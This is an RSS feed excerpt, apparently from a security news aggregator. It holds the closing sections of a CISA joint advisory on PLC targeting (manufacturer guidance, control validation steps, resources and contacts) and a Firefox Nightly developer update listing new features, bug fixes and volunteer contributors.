<li><strong>Reduce risk exposure</strong>. CISA offers a range of services at no cost, including scanning and testing, to help organizations reduce exposure to threats via mitigating attack vectors. CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> can help provide additional review of organizations’ internet-accessible assets. </li>
</ul>
<h3><strong>Device Manufacturers</strong></h3>
<p><strong>Note:</strong> The following guidance is general in nature and not specific to any OT vendor. Some of the features, settings, and practices may already be offered by certain vendors. The inclusion of this guidance should not be interpreted as an assertion that vendors referenced do not offer such security features. Also, this advisory is not highlighting a new vulnerability in the identified products, but instead discusses opportunistic targeting. Device manufacturers can make opportunistic attacks more difficult at scale by encouraging more secure behavior by default and in operations, as discussed below. </p>
<p>Although critical infrastructure organizations using PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products secured by design and default. The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products</a>, primarily:</p>
<ul>
<li>Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.</li>
<li>Do not charge additional fees for basic security features needed to operate the product securely.</li>
<li>Support MFA, including via phishing-resistant methods.</li>
</ul>
<p>By using secure by design tactics, software manufacturers can make product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.</p>
<p>For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a" title="NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations">NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations</a>. For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage and joint guide.</p>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see<strong> </strong><a href="https://www.cisa.gov/#Table3"><strong>Table 3</strong></a> to <a href="https://www.cisa.gov/#Table6"><strong>Table 6</strong></a>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<ul type="square">
<li>Authoring Agencies: <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a" title="IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities">IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities</a></li>
<li>CISA: <a href="https://www.cisa.gov/resources-tools/resources/bulletproof-defense-mitigating-risks-bulletproof-hosting-providers" title="Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers">Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers</a></li>
<li>EPA: <a href="https://www.epa.gov/cyberwater/epa-cybersecurity-water-sector" target="_blank" title="Cybersecurity for the Water Sector">Cybersecurity for the Water Sector</a></li>
<li>CISA: <a href="https://www.cisa.gov/water" title="Water and Wastewater Cybersecurity">Water and Wastewater Cybersecurity</a></li>
<li>CISA: <a href="https://www.cisa.gov/news-events/alerts/2023/11/28/exploitation-unitronics-plcs-used-water-and-wastewater-systems" title="Exploitation of Unitronics PLCs used in Water and Wastewater Systems">Exploitation of Unitronics PLCs used in Water and Wastewater Systems</a></li>
<li>CISA: <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran" title="Iran Cyber Threat Overview and Advisories">Iran Threat Overview and Advisories</a></li>
<li>FBI: <a href="https://www.fbi.gov/investigate/counterintelligence/the-iran-threat" target="_blank" title="The Iran Threat">The Iran Threat</a> and <a href="https://www.fbi.gov/investigate/cyber/cyber-threat-overview-iran" target="_blank" title="Cyber Threat Overview: Iran">Cyber Threat Overview: Iran</a></li>
<li>CISA, MITRE: <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a></li>
<li>CISA: <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a></li>
<li>CISA: <a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0" title="Cross-Sector Cybersecurity Performance Goals 2.0">Cross-Sector Cybersecurity Performance Goals 2.0</a></li>
<li>CISA: <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/cyber-hygiene-services" title="No-Cost Cybersecurity Services and Tools">No-Cost Cybersecurity Services and Tools</a></li>
<li>CISA: <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for OT Owners and Operators when Selecting Digital Products</a></li>
<li>NSA, CISA: <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a" title="NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations">NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations</a></li>
<li>CISA: <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a></li>
<li>FBI, CISA: <a href="https://www.ic3.gov/CSA/2025/250506.pdf" target="_blank" title="Primary Mitigations to Reduce Cyber Threats to Operational Technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a></li>
<li>United Kingdom National Cyber Security Centre: <a href="https://www.ic3.gov/CSA/2026/260114.pdf" target="_blank" title="Secure Connectivity Principles for Operational Technology (OT)">Secure connectivity principles for operational technology</a></li>
</ul>
<h2><a class="ck-anchor"><strong>Contact Information</strong></a></h2>
<p>U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, the FBI, and/or NSA:</p>
<ul type="square">
<li>Contact CISA via CISA’s 24/7 Operations Center at <a href="mailto:contact@cisa.dhs.gov">contact@cisa.dhs.gov</a> or 1-844-Say-CISA (1-844-729-2472). File a claim with FBI’s <a href="https://ic3.gov/" target="_blank" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center (IC3)</a> or contact your local <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="FBI field office">FBI field office</a>. When available, please include the following information regarding the incident: 
<ul>
<li>Date, time, and location of the incident;</li>
<li>Type of activity;</li>
<li>Number of people affected;</li>
<li>Type of equipment used for the activity; and</li>
<li>Name of the submitting company or organization, and a designated point of contact.</li>
</ul>
</li>
<li>For NSA cybersecurity guidance inquiries, contact <a href="mailto:CybersecurityReports@nsa.gov" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a>.</li>
<li>Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact <a href="mailto:EnergySRMA@hq.doe.gov" title="EnergySRMA@hq.doe.gov">EnergySRMA@hq.doe.gov</a>.</li>
<li>Contact the Rockwell Automation PSIRT for questions regarding their guidance or for reporting cyber incidents related to Rockwell Automation products at <a href="mailto:PSIRT@rockwellautomation.com" title="PSIRT@rockwellautomation.com">PSIRT@rockwellautomation.com</a>.</li>
<li>Contact the Schneider Electric CPCERT at <a href="mailto:cpcert@se.com">cpcert@se.com</a> for questions regarding this guidance, or to report cyber incidents related to Schneider Electric products.</li>
<li>Contact Siemens ProductCERT for up-to-date information about the security of Siemens products or to report cybersecurity vulnerabilities at <a href="mailto:productcert@siemens.com">productcert@siemens.com</a>. For support with increasing the security of installed Siemens PLCs, contact Siemens Industrial Cybersecurity Services at <a href="mailto:services.automation@siemens.com">services.automation@siemens.com</a>. See <a href="https://www.siemens.com/en-us/content/cert-services/" target="_blank" title="Siemens ProductCERT and Siemens CERT">Siemens ProductCERT and Siemens CERT</a> for more information.</li>
</ul>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.</p>
<h2><strong>Version History</strong></h2>
<p><strong>April 7, 2026</strong>: Initial version.</p>
<p><strong>July 22, 2026</strong>: Update includes new guidance on detecting malicious activity, expanded scope of observed targeting, and best practices for secure PLCs deployment.</p>
<h2><strong>Notes</strong></h2>
<p><a class="ck-anchor"></a><sup>1</sup>Project file refers to the software file that contains ladder logic and configuration settings. On Rockwell Automation devices, it is referred to as an .ACD file.</p>
<p><a class="ck-anchor"></a><sup>2 </sup>See <a href="https://literature.rockwellautomation.com/idc/groups/literature/documents/um/1769-um021_-en-p.pdf" target="_blank" title="CompactLogix 5370 Controllers">CompactLogix 5370 Controllers</a> (Chapter 5: “Select the Operating Mode of the Controller”) for more information on functions available for the switch.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: Backup for a Rainy Day – These Weeks in Firefox: Issue 202]]></title>
<description><![CDATA[Highlights

The profile backup mechanism has been enabled by default for all desktop platforms in Nightly, as well as Beta! The current plan is to have this ride out to Firefox 151 for Windows, macOS and Linux on May 18th!

This feature, when enabled, will create a copy of your profile data in th...]]></description>
<link>https://tsecurity.de/de/3693295/tools/firefox-nightly-backup-for-a-rainy-day-these-weeks-in-firefox-issue-202/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693295/tools/firefox-nightly-backup-for-a-rainy-day-these-weeks-in-firefox-issue-202/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:35 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>The profile backup mechanism has been enabled by default for all desktop platforms in Nightly, as well as Beta! The current plan is to have this ride out to Firefox 151 for Windows, macOS and Linux on May 18th!
<ul>
<li>This feature, when enabled, will create a copy of your profile data in the background and store it in a single file on your file system that you can restore from.</li>
<li>You will be able to manage this feature in Settings under Sync (for now)
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image6.png"><img alt="Firefox settings page showing the Backup feature in dark mode. Backup is enabled, with details of the most recent backup and a “Backup now” button. The page displays the backup file name and a backup location folder path, along with “Choose…” and “Show in folder” buttons. A “Sensitive data” section includes an option to back up passwords and payment methods with encryption, and a disabled “Change password” button." class="aligncenter size-full wp-image-2074" height="517" src="https://blog.nightly.mozilla.org/files/2026/06/image6.png" width="657"></a></li>
</ul>
</li>
<li><a href="https://support.mozilla.org/kb/firefox-backup">You can read more about the feature here</a></li>
</ul>
</li>
<li>As followups to the recent addition to the WebExtension tabs API to <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Working_with_the_Tabs_API#working_with_tab_split_views">support the new SplitView tabs feature</a>, tabs.group() and tabs.ungroup() have been fixed to work correctly with split view tabs, and fixed split views being prepended instead of appended to tab groups when adopted into a new window –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029099"> Bug 2029099</a> /<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029534"> Bug 2029534</a></li>
<li>Adaptive autofill has been enabled on Nightly.
<ul>
<li>Previously, autofill only completed domains (e.g. typing red autofilled<a href="http://reddit.com/"> reddit.com</a>). Now it can also complete full URLs for pages you visit often (e.g. red →<a href="http://reddit.com/r/firefox"> reddit.com/r/firefox</a>), learning from what you actually click in the address bar. If a suggestion isn’t helpful, you can now dismiss it so autofill learns what not to show you too.
<ul>
<li>If you run into issues or have feedback, <a href="https://bugzilla.mozilla.org/enter_bug.cgi?product=Firefox&amp;component=Address+Bar">you can file a bug here</a>!</li>
</ul>
</li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=293943">Markus Stange [:mstange]</a> implemented dynamic toolbar on top in RDM (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1978145">#1978145</a>), but also implemented some static skeleton UI so it’s closer to what we actually have in Firefox for Android
<ul>
<li>dynamic toolbar is behind a pref: devtools.responsive.dynamicToolbar.enabled</li>
<li>it can be put on top by setting devtools.responsive.dynamicToolbar.onTop, otherwise it’s at the bottom</li>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image1.png"><img alt="Firefox Responsive Design Mode on Desktop displaying the Mozilla homepage in a mobile viewport. The toolbar at the top shows a simulated Android device (including the dynamic toolbar) with a viewport size of 376 × 464 pixels and a device pixel ratio of 3. The page content is shown in French, featuring the Mozilla logo, a “Menu” link, a “Pause animation” button, and the headline “Bienvenue chez Mozilla” with accompanying text about trusted technology and digital rights." class="aligncenter size-full wp-image-2069" height="1113" src="https://blog.nightly.mozilla.org/files/2026/06/image1.png" width="882"></a></li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h3><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=958957%2C1876109%2C1997388%2C2000797%2C1950995%2C1986020%2C2018272%2C2018276%2C2021681%2C2027969%2C2022115%2C1999012%2C2016058%2C2026585%2C2023913%2C2028167%2C2028293%2C2028927%2C1998002%2C2011343%2C1997925%2C2026574%2C2029398%2C2029684%2C1948019%2C2008756%2C2022601%2C2026032%2C2030428%2C1968244%2C1975391%2C944228%2C1962904%2C1977741%2C1997346%2C2027867%2C2030631%2C1807516%2C2030998%2C2030999%2C2015491%2C2028153%2C2028628%2C1978290%2C2008128%2C2024033%2C1883497%2C1984679%2C2030069%2C2031162%2C2031598%2C2012399%2C2031116%2C2031128%2C2031931%2C2031961%2C2033173%2C2032997%2C1919387%2C1947679%2C2027915%2C2032196%2C2019561%2C2024187%2C1392125%2C1993844%2C2027060%2C1983408%2C2034178%2C1873954%2C1875083%2C2008119%2C2008197%2C1628669%2C2031599%2C2033820">Resolved bugs (excluding employees)</a></h3>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Amin Amir</li>
<li>aoia7rz7l</li>
<li>Chukwuka Rosemary</li>
<li>DrSeed</li>
<li>Frédéric Wang Nélar</li>
<li>japandi</li>
<li>John Iweh</li>
<li>jonathancabera</li>
<li>Josh Aas</li>
<li>Keji Bakare</li>
<li>kofoworola shonuyi</li>
<li>konyhéa</li>
<li>liz</li>
<li>Mathew Hodson</li>
<li>Okhuomon Ajayi</li>
<li>Oluwatobi</li>
<li>ROSHAAN</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li> Anthony Mclamb:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027915"> Disable the legacy Edge migrator</a></li>
<li> Amin Amir
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">Fix browsingContext.sys.mjs to assign to #contextCreatedHandled instead of contextCreatedHandled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033820">Fix missing WITHOUT ROWID SQLite performance optimization in SERPCategorization.sys.mjs</a></li>
<li>🌟 Amine Zroual:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1392125"> Omitted maxResults property not handled correctly in getRecentlyClosed</a></li>
</ul>
</li>
<li>any1here:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031162"> install_sig_alt_stack incorrectly checks mmap’s return value</a></li>
<li>🌟 Armin Ulrich:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031598"> Fix MessageHandlerRegistry.sys.mjs calling getExistingMessageHandler with an unused second argument</a></li>
<li>japandi
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1628669">Cannot remove amazon.com from top sites list</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1977741">The height of the pinned tabs area should be responsive to the number of pins</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1986020">Use cenum for nsIHelperAppLauncherDialog reason constants to enable better typescript annotations</a></li>
</ul>
</li>
<li>Nathan Johnson [:narjoDev]:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1950995"> Remove browser.display.use_system_colors pref</a></li>
<li>DrSeed
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1962904">Firefox shows vertical tabs in new windows despite “Hide tabs and sidebar” setting</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968244">The “Expand sidebar on hover” option is not kept after the vertical tabs are disabled and enabled again</a></li>
</ul>
</li>
<li>Keji Bakare:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008756">Split view’s focus-outline is clipped on the right side of left tab</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031116">White space on the right side of left panel in split view</a></li>
</ul>
</li>
<li>🌟 gotyaoi:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1807516"> Reload toolbar button is active on about:newtab</a></li>
<li>Itoro James:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015491"> [A11y][Keyboard Navigation]Cancelling a note via Keyboard Navigation still saves it</a></li>
<li>John Iweh:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997925"> The notification dot is not displayed if the tab is in a Split View</a></li>
<li>🌟 John Iweh:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027867"> sidebar-shown attribute remains when sidebar.revamp is false</a></li>
<li>🌟 jonathancabera:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2012399">The Move tab to Split View option is also displayed for the tabs that are within the Split View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016058">A Note with long text (1003 characters) is saved by pressing ENTER even if the “Save” button is disabled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026032">Tab group guide line becomes disconnected under certain conditions related to split views in vertical tab mode</a></li>
</ul>
</li>
<li>Aloys:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2000797"> Remove logic that forces distribution language packs to be reinstalled when upgrading from Firefoxes older than 67</a></li>
<li>liz:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1875083">Create test to ensure maxRenderCountEstimate is never being set to Infinity in virtual-list component in Fx View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008119">Button accessible name does not convey its function: missing topic context (Settings dialog &gt; Topics dialog &gt; buttons Following/Unfollow/Blocked/Unblock)</a></li>
</ul>
</li>
<li>Mary cathline:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022115"> Tab Group Label does not respect touch density in vertical tab bar</a></li>
<li>🌟 Brandon Lucier:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030631"> Popups opened with window.open give window type normal instead of popup</a></li>
<li>karan68:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997388"> [dialog] New Shortcut dialog needs a label/accessible name</a></li>
<li>🌟 Vector:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008128"> Button does not programmatically indicate that it opens a dialog (Recent activity section &gt; story card &gt; ••• disclosure &gt; Delete from History button)</a></li>
<li>🌟 Osoble:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1876109"> Update font size and weight for synced tabs device name headers in Firefox View</a></li>
<li>konyhéa:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1873954">Add test for sync admin disabled to browser_syncedtabs_errors_firefoxview.js</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1883497">Check all second paramaters for TestUtils.waitForCondition in Fx View test files</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030069">Recently Closed Tabs, Tabs from Other Devices, and History pages should have Cmd / Ctrl + Click on a link open the link in the new background tab.</a></li>
</ul>
</li>
<li>Noble Chinonso: <a href="http://sidebartreeview.js/">#shouldHandleEvent in SidebarTreeView.js compares event.keyCode to string values, causing Home/End keys to never be handled</a></li>
<li>Pranjali Srivastava:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=944228"> Add a test to verify that the space above tabs is consistent across PB, LWT and sizemode (where appropriate)</a></li>
<li>Okhuomon Ajayi:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018272">More spacing is needed between the tab note icon and the close icon on the tab</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019561">The tabs in vertical mode collapsed state are positioned differently in Split View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027060">Keep vertical split view tabs stacked vertically even when the sidebar is expanded when expand on hover is enabled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029684">Vertical split view tabs can be too big or small when tabs are overflowing</a></li>
</ul>
</li>
<li>🌟 Rishan:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030428"> Fix duplicated arrow function in browser_history_sidebar.js</a></li>
<li>Chukwuka Rosemary:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1948019">“Forget About This Site” context menu option missing from Firefox View history</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026574">Long strings are not displayed properly on the about:opentabs page search filed</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028153">Add test for Forget This Site option in Fxview history context menu.</a></li>
</ul>
</li>
<li>ROSHAAN:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018276">Tab note background colour is incorrect for default light theme</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997346"> [win/linux] The splitter between content areas does not match Figma spec</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028927">Fix typo in OpenInTabsUtils.confirmOpenInTabs()</a></li>
</ul>
</li>
<li>Sameeksha:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008197"> Disclosure button expanded/collapsed state not programmatically defined (Customize button)</a></li>
<li>kofoworola shonuyi:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1999012">Actually hide or remove sidebar-shown attribute when in fullscreen.</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028293">Add a test for checking sidebar-shown attribute in fullscreen mode</a></li>
</ul>
</li>
<li>🌟 Sayd Mateen:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021681"> Page URL is displayed as tab name when page’s contains about:reader?&lt;/a&gt;&lt;/p&gt; &lt;p&gt;</a></li>
</ul>
<ul>
<li>Oluwatobi:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1975391">Unable to delete selected history entries from sidebar</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1993844">Incorrect Sidebar button state/tooltip hover text</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023913">The city name heading level doesn’t follow the correct heading level order</a></li>
</ul>
</li>
<li>Nishchay [:nish]:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031961"> Unable to add tabs to old closed tab groups (tabGroupState.splitViews is undefined)</a></li>
</ul>
<p> </p>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>In preparation for the Project Nova restyling of the about:addons page, we have refactored about:addons into separate per-component ES modules, splitting the monolithic aboutaddons.js and aboutaddons.html into 16 dedicated component files under components/ (with no behavior or UI changes) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032014"> Bug 2032014</a>
<ul>
<li>NOTE: if you have working on patches with changes to about:addons internals it is very likely you’ll need to rebase and solve merge conflicts hit on top of this refactoring, the internals are still largely the same as before but don’t hesitate to reach out to the Addons team if you have doubts / questions or need help to figure out how to adapt your patch of top of these changes</li>
</ul>
</li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed exportFunction to preserve the constructibility of the wrapped function instead of unconditionally making all exported functions implicitly as constructors –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033173"> Bug 2033173</a>
<ul>
<li>Thanks to Gregory Pappas for contributing this improvement to the Content Scripts’ Xray Wrappers helpers!</li>
</ul>
</li>
<li>Fixed a Firefox 151 regression where extension content scripts accessing location.ancestorOrigins caused subsequent page script reads of the same property to fail with “Permission denied”, breaking sites like Gmail –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034329"> Bug 2034329</a>
<ul>
<li>Thanks to Simon Farre for promptly investigating and fixing this recent regression!</li>
</ul>
</li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Updated sessions.getRecentlyClosed() to remove the hardcoded cap when maxResults is omitted –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1392125"> Bug 1392125</a>
<ul>
<li>Shoutout to Amine Zroual for contributing this enhancement to the sessions WebExtensions API!</li>
</ul>
</li>
</ul>
<h4>DevTools</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=750915">Artem Manushenkov</a> fixed an issue where autosuggestion popup was removing overridden indicators from properties in the Inspector (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1983408">#1983408</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=446257">Andrea Marchesini [:baku]</a> fix DevTools cookie header serialization for long cookies, which could lead to cookies not being visible in Netmonitor (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031299">#2031299</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> fixed a toolbox crash that was happening we couldn’t find a localization file (e.g. when using a language pack on Nightly) (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028930">#2028930</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> improved @container tooltip so it show the value of variables used in style()(<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030239">#2030239</a>), has enough contrast in dark mode (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033782">#2033782</a>) and contains a link to select the container (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031688">#2031688</a>)
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image3.png"><img alt='Firefox Developer Tools showing a CSS @container style() rule in the Rules panel. A popover for a element displays container properties including "container-name: hello section-container", "container-type: inline-size", and the custom property "--w: 100px", while indicating that --secondary and --plouf are not set. Below, the container query uses nested var() fallbacks, and a CSS declaration previews the resolved value for background-color.' class="aligncenter size-full wp-image-2071" height="532" src="https://blog.nightly.mozilla.org/files/2026/06/image3.png" width="1038"></a></li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=656417">Hubert Boma Manilla (:bomsy)</a> is making good progress on migrating the Console to CodeMirror 6 (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032758">#2032758</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026569">#2026569</a>)</li>
</ul>
<h4>Fluent</h4>
<ul>
<li>We’re now at over 72% of our strings being Fluent! Got a component still using .properties? Convert when you can!</li>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image5.png"><img alt="Stacked area chart titled “Are We Fluent Yet?” showing the number and type of localization strings available in Firefox from 2018 to 2026. The chart tracks Fluent strings (green), Properties strings (blue), DTD strings (pink), and a small number of INI strings. Over time, Fluent strings steadily increase while DTD and Properties strings decline. A tooltip at April 26, 2026 shows 10,372 Fluent strings, 3,997 Properties strings, and no remaining DTD or INC strings, illustrating Firefox’s ongoing migration to the Fluent localization system." class="aligncenter size-full wp-image-2073" height="924" src="https://blog.nightly.mozilla.org/files/2026/06/image5.png" width="1509"></a></li>
</ul>
<h4>Migration Improvements</h4>
<ul>
<li>Thanks to dao for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035009">fixing a recent alignment issue in the migration wizard dropdown</a></li>
<li>Thanks to volunteer contributor Anthony Mclamb for his patch that <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027915">disables the legacy EdgeHTML Edge migrator</a>! Once that finishes rolling out, presuming no surprises, we’ll go ahead and remove the migrator entirely.</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>Nova for New Tab has ridden the trains to Beta! It will be enabled by default, globally, when Firefox 151 goes out to release on May 19th
<ul>
<li>It’s possible that we’ll do a train-hop coupled with an experiment to enable HNT Nova for a few clients a bit earlier.</li>
</ul>
</li>
<li>Maxx Crawford<a href="https://bugzil.la/2032213"> enabled Nova designs for New Tab</a>, rolling out the updated layout, widgets, and customization panel behind HNT Nova flags.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2033165"> fixed the Nova content feed to render the intended four‑column layout</a> by correcting CSS grid breakpoints.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2033264"> resolved a first‑load failure in the Weather widget</a> by fixing init order and fetch timing, eliminating the “Oops” error.</li>
